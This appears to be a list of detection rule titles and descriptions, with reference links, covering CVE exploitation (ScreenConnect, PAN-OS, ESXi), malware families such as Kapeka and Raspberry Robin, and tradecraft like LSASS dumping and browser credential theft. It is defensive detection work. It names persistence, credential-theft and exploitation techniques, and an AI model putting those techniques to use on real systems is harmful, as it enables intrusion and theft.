CVE-2024-1709 - ScreenConnect Authentication Bypass Exploitation Detects GET requests to '/SetupWizard.aspx/[anythinghere]' that indicate exploitation of the ScreenConnect vulnerability CVE-2024-1709. https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass, https://www.cve.org/CVERecord?id=CVE-2024-1709
ScreenConnect User Database Modification - Security This detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions. This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory. https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.cve.org/CVERecord?id=CVE-2024-1709, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process Detects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094. https://github.com/amlweems/xzbot?tab=readme-ov-file#backdoor-demo
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled. As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function. https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/, https://nvd.nist.gov/vuln/detail/CVE-2024-3400
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection Detects potential exploitation attempts of CVE-2024-3400 - an OS command injection in Palo Alto GlobalProtect. This detection looks for suspicious strings that indicate a potential directory traversal attempt or command injection. https://security.paloaltonetworks.com/CVE-2024-3400, https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/, https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group Detects execution of the "net.exe" command in order to add a group named "ESX Admins". This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor. VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default. https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/
Potential Exploitation of CVE-2024-37085 - Suspicious ESX Admins Group Activity Detects any creation or modification to a windows domain group with the name "ESX Admins". This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor. VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default. https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/
CVE-2024-49113 Exploitation Attempt - LDAP Nightmare Detects exploitation attempt of CVE-2024-49113 known as LDAP Nightmare, based on "Application Error" log where the faulting application is "lsass.exe" and the faulting module is "WLDAP32.dll". https://gist.github.com/travisbgreen/82b68bac499edbe0b17dcbfa0c5c71b7, https://www.linkedin.com/feed/update/urn:li:activity:7282295814792605698/
CVE-2024-50623 Exploitation Attempt - Cleo Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline. https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild
Potential CSharp Streamer RAT Loading .NET Executable Image Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool. https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/#detections, https://cyber.wtf/2023/12/06/the-csharp-streamer-rat/
DarkGate - Drop DarkGate Loader In C:\Temp Directory Detects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\temp folder. https://www.bleepingcomputer.com/news/security/hackers-exploit-windows-smartscreen-flaw-to-drop-darkgate-malware/, https://www.trendmicro.com/en_us/research/24/c/cve-2024-21412--darkgate-operators-exploit-microsoft-windows-sma.html
File Creation Related To RAT Clients File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild. https://www.virustotal.com/gui/file/c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761, https://www.virustotal.com/gui/file/e96a0c1bc5f720d7f0a53f72e5bb424163c943c24a437b1065957a79f5872675
Potential KamiKakaBot Activity - Lure Document Execution Detects the execution of a Word document via the WinWord Start Menu shortcut. This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection. https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/
Potential KamiKakaBot Activity - Shutdown Schedule Task Creation Detects the creation of a schedule task that runs weekly and execute the "shutdown /l /f" command. This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system. https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/, https://tria.ge/240123-rapteaahhr/behavioral1
Potential KamiKakaBot Activity - Winlogon Shell Persistence Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence. https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/
Potential Kapeka Decrypted Backdoor Indicator Detects the presence of a file that is decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named "Microsoft" within "CSIDL_COMMON_APPDATA" or "CSIDL_LOCAL_APPDATA", depending on the process privileges. The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a ".wll" extension to pose as a legitimate file to evade detection. https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/
Kapeka Backdoor Loaded Via Rundll32.EXE Detects the Kapeka Backdoor binary being loaded by rundll32.exe. The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In. https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/
Kapeka Backdoor Persistence Activity Detects Kapeka backdoor persistence activity. Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not). For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM. To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command. Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument. https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/, https://www.virustotal.com/gui/file/bd07fb1e9b4768e7202de6cc454c78c6891270af02085c51fce5539db1386c3f/behavior
Kapeka Backdoor Execution Via RunDLL32.EXE Detects Kapeka backdoor process execution pattern, where the dropper launch the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument. https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/
Kapeka Backdoor Autorun Persistence Detects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence. https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/
Kapeka Backdoor Configuration Persistence Detects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key. The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence. https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/
Kapeka Backdoor Scheduled Task Creation Detects Kapeka backdoor scheduled task creation based on attributes such as paths, commands line flags, etc. https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698, https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/, https://www.virustotal.com/gui/file/bd07fb1e9b4768e7202de6cc454c78c6891270af02085c51fce5539db1386c3f/behavior
Lummac Stealer Activity - Execution Of More.com And Vbc.exe Detects the execution of more.com and vbc.exe in the process tree. This behavior was observed by a set of samples related to Lummac Stealer. The Lummac payload is injected into the vbc.exe process. https://www.virustotal.com/gui/search/behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CSysWOW64%255C%255Cmore.com%2522%2520behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CMicrosoft.NET%255C%255CFramework%255C%255Cv4.0.30319%255C%255Cvbc.exe%2522/files, https://www.virustotal.com/gui/file/14d886517fff2cc8955844b252c985ab59f2f95b2849002778f03a8f07eb8aef, https://strontic.github.io/xcyclopedia/library/more.com-EDB3046610020EE614B5B81B0439895E.html, https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html
Potential Raspberry Robin Aclui Dll SideLoading Detects potential sideloading of malicious "aclui.dll" by OleView.This behavior was observed in Raspberry-Robin variants reported by chekpoint research on Feburary 2024. https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/, https://globetech.biz/index.php/2023/05/19/evading-edr-by-dll-sideloading-in-csharp/, https://decoded.avast.io/threatintel/apt-treasure-trove-avast-suspects-chinese-apt-group-mustang-panda-is-collecting-data-from-burmese-government-agencies-and-opposition-groups/, https://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/, https://strontic.github.io/xcyclopedia/library/aclui.dll-F883E9CA757B622B032FDCA5BF33D0DF.html
Potential Raspberry Robin CPL Execution Activity Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function. This behavior was observed in multiple Raspberry-Robin variants. https://tria.ge/240226-fhbe7sdc39/behavioral1, https://bazaar.abuse.ch/browse/signature/RaspberryRobin/
Potential Raspberry Robin Registry Set Internet Settings ZoneMap Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024. Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections. https://tria.ge/240225-jlylpafb24/behavioral1/analog?main_event=Registry&op=SetValueKeyInt, https://tria.ge/240307-1hlldsfe7t/behavioral2/analog?main_event=Registry&op=SetValueKeyInt, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_ProxyByPass, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_UNCAsIntranet, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_IncludeUnspecifiedLocalSites, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::SecurityPage_AutoDetect, https://bazaar.abuse.ch/browse/signature/RaspberryRobin/
DPRK Threat Actor - C2 Communication DNS Indicators Detects DNS queries for C2 domains used by DPRK Threat actors. https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2024-02-19-joint-cyber-security-advisory-englisch.pdf?__blob=publicationFile&v=2
Potential APT FIN7 Exploitation Activity Detects potential APT FIN7 exploitation activity as reported by Google. In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains. https://cloud.google.com/blog/topics/threat-intelligence/evolution-of-fin7/
Forest Blizzard APT - File Creation Activity Detects the creation of specific files inside of ProgramData directory. These files were seen being created by Forest Blizzard as described by MSFT. https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/
Forest Blizzard APT - JavaScript Constrained File Creation Detects the creation of JavaScript files inside of the DriverStore directory. Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions. https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/
Forest Blizzard APT - Process Creation Activity Detects the execution of specific processes and command line combination. These were seen being created by Forest Blizzard as described by MSFT. https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/
Forest Blizzard APT - Custom Protocol Handler Creation Detects the setting of a custom protocol handler with the name "rogue". Seen being created by Forest Blizzard APT as reported by MSFT. https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/
Forest Blizzard APT - Custom Protocol Handler DLL Registry Set Detects the setting of the DLL that handles the custom protocol handler. Seen being created by Forest Blizzard APT as reported by MSFT. https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/
ScreenConnect - SlashAndGrab Exploitation Indicators Detects indicators of exploitation by threat actors during exploitation of the "SlashAndGrab" vulnerability related to ScreenConnect as reported Team Huntress https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708
Account Created And Deleted By Non Approved Users Detects accounts that are created or deleted by non-approved users. https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts
Authentication Occuring Outside Normal Business Hours Detects user signs ins outside of normal business hours. https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins
Privilege Role Elevation Not Occuring on SAW or PAW Detects failed sign-in from a PAW or SAW device https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor
Privilege Role Sign-In Outside Expected Controls Detects failed sign-in due to user not meeting expected controls for adminitrators https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor
Privilege Role Sign-In Outside Of Normal Hours Detects account sign ins outside of normal hours or uncommon locations. Administrator accounts should be investigated https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor
User with Privileges Logon Detects logon with "Special groups" and "Special Privileges" can be thought of as Administrator groups or privileges. https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672, https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964
Potential Zerologon (CVE-2020-1472) Exploitation Detects potential Netlogon Elevation of Privilege Vulnerability aka Zerologon (CVE-2020-1472) https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472, https://www.logpoint.com/en/blog/detecting-zerologon-vulnerability-in-logpoint/
Potential Pass the Hash Activity Detects the attack technique pass the hash which is used to move laterally inside the network https://github.com/nsacyber/Event-Forwarding-Guidance/tree/6e92d622fa33da911f79e7633da4263d632f9624/Events
Remote Registry Management Using Reg Utility Remote registry management using REG utility from non-admin workstation https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
Interactive Logon to Server Systems Detects interactive console logons to Server Systems Internal Research
DNS Request From Windows Script Host Detects unusual domain resolutions originating from CScript/WScript that can identify malicious javascript files executing in an environment, often as a result from a phishing or watering hole attack. Internal Research
New RDP Connection Initiated From Domain Controller Detects an RDP connection originating from a domain controller. Internal Research
Userdomain Variable Enumeration Detects suspicious enumeration of the domain the user is associated with. https://www.arxiv-vanity.com/papers/2008.04676/, https://thedfirreport.com/2022/11/14/bumblebee-zeros-in-on-meterpreter/
Mail Forwarding/Redirecting Activity In O365 Detects email forwarding or redirecting acitivty in O365 Audit logs. https://redcanary.com/blog/email-forwarding-rules/, https://github.com/PwC-IR/Business-Email-Compromise-Guide/blob/fe29ce06aef842efe4eb448c26bbe822bf5b895d/PwC-Business_Email_Compromise-Guide.pdf
Python Path Configuration File Creation - Linux Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/, https://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac, https://docs.python.org/3/library/site.html
Okta Password Health Report Query Detects all activities against the endpoint "/reports/password-health/*" which should only be accessed via OKTA Admin Console UI. Use this rule to hunt for potential suspicious requests. Correlate this event with "admin console" login and alert on requests without any corresponding admin console login https://www.beyondtrust.com/blog/entry/okta-support-unit-breach
Terminate Linux Process Via Kill Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process. https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html, https://www.cyberciti.biz/faq/how-force-kill-process-linux/, https://www.geeksforgeeks.org/how-to-kill-processes-on-the-linux-desktop-with-xkill/
Process Discovery Detects process discovery commands. Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md, https://www.cyberciti.biz/faq/show-all-running-processes-in-linux/
Python Path Configuration File Creation - MacOS Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/, https://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac, https://docs.python.org/3/library/site.html
Clipboard Data Collection Via Pbpaste Detects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout). The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands. It can also be used in shell scripts that may require clipboard content as input. Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information. Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content. https://www.loobins.io/binaries/pbpaste/, https://medium.com/@NullByteWht/hacking-macos-how-to-dump-1password-keepassx-lastpass-passwords-in-plaintext-723c5b1c311b, https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF
.Class Extension URI Ending Request Detects requests to URI ending with the ".class" extension in proxy logs. This could rules can be used to hunt for potential downloads of Java classes as seen for example in Log4shell exploitation attacks against Log4j. https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/
Firewall Rule Modified In The Windows Firewall Exception List Detects when a rule has been modified in the Windows firewall exception list https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)
Access To Browser Credential Files By Uncommon Applications - Security Detects file access requests to browser credential stores by uncommon processes. Could indicate potential attempt of credential stealing This rule requires heavy baselining before usage. https://ipurple.team/2024/09/10/browser-stored-credentials/
Scheduled Task Deletion Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \TASKNAME https://twitter.com/matthewdunwoody/status/1352356685982146562, https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699
Potential Remote WMI ActiveScriptEventConsumers Activity Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network. This event is best correlated and used as an enrichment to determine the potential lateral movement activity. https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html
CreateRemoteThread API and LoadLibrary Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process https://threathunterplaybook.com/hunts/windows/180719-DLLProcessInjectionCreateRemoteThread/notebook.html
Remote Thread Creation Via PowerShell Detects the creation of a remote thread from a Powershell process to another process https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Access To Browser Credential Files By Uncommon Applications Detects file access requests to browser credential stores by uncommon processes. Could indicate potential attempt of credential stealing. Requires heavy baselining before usage https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users, https://github.com/lclevy/firepwd
Access To Chromium Browsers Sensitive Files By Uncommon Applications Detects file access requests to chromium based browser sensitive files by uncommon processes. Could indicate potential attempt of stealing sensitive information. Internal Research
Access To Windows Outlook Mail Files By Uncommon Applications Detects file access requests to Windows Outlook Mail by uncommon processes. Could indicate potential attempt of credential stealing. Requires heavy baselining before usage https://darkdefender.medium.com/windows-10-mail-app-forensics-39025f5418d2, https://github.com/redcanaryco/atomic-red-team/blob/58496ee3306e6e42a7054d36a94e6eb561ee3081/atomics/T1070.008/T1070.008.md#atomic-test-4---copy-and-modify-mailbox-data-on-windows
Access To Sysvol Policies Share By Uncommon Process Detects file access requests to the Windows Sysvol Policies Share by uncommon processes https://github.com/vletoux/pingcastle
Access To .Reg/.Hive Files By Uncommon Applications Detects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups. https://github.com/tccontre/Reg-Restore-Persistence-Mole
Unattend.XML File Access Attempt Detects attempts to access the "unattend.xml" file, where credentials might be stored. This file is used during the unattended windows install process. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md
ADS Zone.Identifier Deleted Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/
DMP/HDMP File Creation Detects the creation of a file with the ".dmp"/".hdmp" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash. https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps
Python Path Configuration File Creation - Windows Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/, https://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac, https://docs.python.org/3/library/site.html
Scheduled Task Created - FileCreation Detects the creation of a scheduled task via file creation. https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/task_scheduling/, https://posts.specterops.io/abstracting-scheduled-tasks-3b6451f6a1c5
Creation of an Executable by an Executable Detects the creation of an executable by another executable. Internal Research
VsCode Code Tunnel Execution File Indicator Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html
WebDAV Temporary Local File Creation Detects the creation of WebDAV temporary files with potentially suspicious extensions https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html, https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462, https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4
Non-DLL Extension File Renamed With DLL Extension Detects rename operations of files with non-DLL extensions to files with a DLL extension. This is often performed by malware in order to avoid initial detections based on extensions. https://twitter.com/ffforward/status/1481672378639912960, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036/T1036.md#atomic-test-1---system-file-copied-to-unusual-location
Amsi.DLL Load By Uncommon Process Detects loading of Amsi.dll by uncommon processes https://infosecwriteups.com/amsi-bypass-new-way-2023-d506345944e9, https://github.com/TheD1rkMtr/AMSI_patch, https://github.com/surya-dev-singh/AmsiBypass-OpenSession
Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process Detects the load of dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process. The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL. https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump, https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html, https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6
System Drawing DLL Load Detects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture. https://github.com/OTRF/detection-hackathon-apt29/issues/16, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.md
Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location Detects the loading of the "taskschd.dll" module from a process that located in a potentially suspicious or uncommon directory. The loading of this DLL might indicate that the application have the capability to create a scheduled task via the "Schedule.Service" COM object. Investigation of the loading application and its behavior is required to determining if its malicious. https://www.logpoint.com/en/blog/shenanigans-of-scheduled-tasks/, https://x.com/Max_Mal_/status/1826179497084739829
Microsoft Excel Add-In Loaded Detects Microsoft Excel loading an Add-In (.xll) file https://www.mandiant.com/resources/blog/lnk-between-browsers
Microsoft Word Add-In Loaded Detects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence. https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence, https://nored0x.github.io/red-teaming/office-persistence/#what-is-a-wll-file
WMI Module Loaded By Uncommon Process Detects WMI modules being loaded by an uncommon process https://threathunterplaybook.com/hunts/windows/190811-WMIModuleLoad/notebook.html
Dfsvc.EXE Network Connection To Non-Local IPs Detects network connections from "dfsvc.exe" used to handled ClickOnce applications to non-local IPs https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
Dfsvc.EXE Initiated Network Connection Over Uncommon Port Detects an initiated network connection over uncommon ports from "dfsvc.exe". A utility used to handled ClickOnce applications. https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
Dllhost.EXE Initiated Network Connection To Non-Local IP Address Detects Dllhost.EXE initiating a network connection to a non-local IP address. Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. An initial baseline is recommended before deployment. https://redcanary.com/blog/child-processes/, https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08
HH.EXE Initiated HTTP Network Connection Detects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files. https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html, https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md
Msiexec.EXE Initiated Network Connection Over HTTP Detects a network connection initiated by an "Msiexec.exe" process over port 80 or 443. Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages. Use this rule to hunt for potentially anomalous or suspicious communications. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
Network Connection Initiated By PowerShell Process Detects a network connection that was initiated from a PowerShell process. Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs. Use this rule as a basis for hunting for anomalies. https://www.youtube.com/watch?v=DLtJTxMWZ2o
Potentially Suspicious Azure Front Door Connection Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2) that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints) https://lots-project.com/site/2a2e617a75726566642e6e6574, https://medium.com/r3d-buck3t/red-teaming-in-cloud-leverage-azure-frontdoor-cdn-for-c2-redirectors-79dd9ca98178, https://www.fortalicesolutions.com/posts/hiding-behind-the-front-door-with-azure-domain-fronting
Network Connection Initiated From Users\Public Folder Detects a network connection initiated from a process located in the "C:\Users\Public" folder. Attacker are known to drop their malicious payloads and malware in this directory as its writable by everyone. Use this rule to hunt for potential suspicious or uncommon activity in your environement. https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo
PsExec Default Named Pipe Detects PsExec service default pipe creation https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet
